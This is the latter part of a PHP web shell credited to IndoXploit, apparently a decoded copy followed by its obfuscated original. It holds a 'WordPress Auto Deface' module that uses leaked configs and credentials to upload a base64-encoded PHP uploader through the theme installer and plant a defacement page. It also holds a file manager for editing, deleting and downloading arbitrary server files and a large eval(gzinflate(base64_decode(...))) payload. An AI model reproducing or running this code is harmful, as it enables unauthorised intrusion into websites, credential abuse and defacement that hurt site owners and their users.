$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" => "Install Now",
);
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='blue'>berhasil mepes...</font><br>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
} else {
echo "[-] <font color='purple'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
echo "[+] username: <font color=blue>$user</font><br>";
echo "[+] password: <font color=blue>$pass</font><br><br>";
}
mysql_close($conn);
}
}
} else {
echo "<center><h1>WordPress Auto Deface V.2</h1>
<form method='post'>
Link Config: <br>
<textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' requipurple><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
</form></center>";
}
} elseif($_GET['act'] == 'newfile') {
if($_POST['new_save_file']) {
$newfile = htmlspecialchars($_POST['newfile']);
$fopen = fopen($newfile, "a+");
if($fopen) {
$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
} else {
$act = "<font color=purple>permission denied</font>";
}
}
echo $act;
echo "<form method='post'>
Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
<input type='submit' name='new_save_file' value='Submit'>
</form>";
} elseif($_GET['act'] == 'newfolder') {
if($_POST['new_save_folder']) {
$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
if(!mkdir($new_folder)) {
$act = "<font color=purple>permission denied</font>";
} else {
$act = "<script>window.location='?dir=".$dir."';</script>";
}
}
echo $act;
echo "<form method='post'>
Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
<input type='submit' name='new_save_folder' value='Submit'>
</form>";
} elseif($_GET['act'] == 'rename_dir') {
if($_POST['dir_rename']) {
$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
if($dir_rename) {
$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
} else {
$act = "<font color=purple>permission denied</font>";
}
echo "".$act."<br>";
}
echo "<form method='post'>
<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
<input type='submit' name='dir_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete_dir') {
$delete_dir = rmdir($dir);
if($delete_dir) {
$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
} else {
$act = "<font color=purple>could not remove ".basename($dir)."</font>";
}
echo $act;
} elseif($_GET['act'] == 'view') {
echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
if($_POST['save']) {
$save = file_put_contents($_GET['file'], $_POST['src']);
if($save) {
$act = "<font color=blue>Saved!</font>";
} else {
$act = "<font color=purple>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<form method='post'>
<textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
<input type='submit' value='Save' name='save' style='width: 500px;'>
</form>";
} elseif($_GET['act'] == 'rename') {
if($_POST['do_rename']) {
$rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
if($rename) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=purple>permission denied</font>";
}
echo "".$act."<br>";
}
echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
echo "<form method='post'>
<input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
<input type='submit' name='do_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete') {
$delete = unlink($_GET['file']);
if($delete) {
$act = "<script>window.location='?dir=".$dir."';</script>";
} else {
$act = "<font color=purple>permission denied</font>";
}
echo $act;
} elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
} else {
if(is_dir($dir) == true) {
echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<th class="th_home"><center>Name</center></th>
<th class="th_home"><center>Type</center></th>
<th class="th_home"><center>Size</center></th>
<th class="th_home"><center>Last Modified</center></th>
<th class="th_home"><center>Permission</center></th>
<th class="th_home"><center>Action</center></th>
</tr>';
$scandir = scandir($dir);
foreach($scandir as $dirx) {
$dtype = filetype("$dir/$dirx");
$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
if(!is_dir("$dir/$dirx")) continue;
if($dirx === '..') {
$href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
} elseif($dirx === '.') {
$href = "<a href='?dir=$dir'>$dirx</a>";
} else {
$href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
}
if($dirx === '.' || $dirx === '..') {
$act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
} else {
$act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
}
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
echo "<td class='td_home'><center>$dtype</center></td>";
echo "<td class='td_home'><center>-</center></th>";
echo "<td class='td_home'><center>$dtime</center></td>";
echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
}
echo "</tr>";
foreach($scandir as $file) {
$ftype = filetype("$dir/$file");
$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
$size = filesize("$dir/$file")/1024;
$size = round($size,3);
if($size > 1024) {
$size = round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
}
if(!is_file("$dir/$file")) continue;
echo "<tr>";
echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
echo "<td class='td_home'><center>$ftype</center></td>";
echo "<td class='td_home'><center>$size</center></td>";
echo "<td class='td_home'><center>$ftime</center></td>";
echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
}
echo "</tr></table><hr>";
} else {
echo "<font color=purple>can't open directory</font>";
}
echo "<center>Recoded By <a href='http://backboxindonesia.or.id' target='_blank'><font color=red>Hightech</font></a> || Copyright © ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=blue>IndoXploit</font></a></center>";
}
?>
</html>
Did this file decode correctly?
Original Code
<?php
eval(gzinflate(base64_decode('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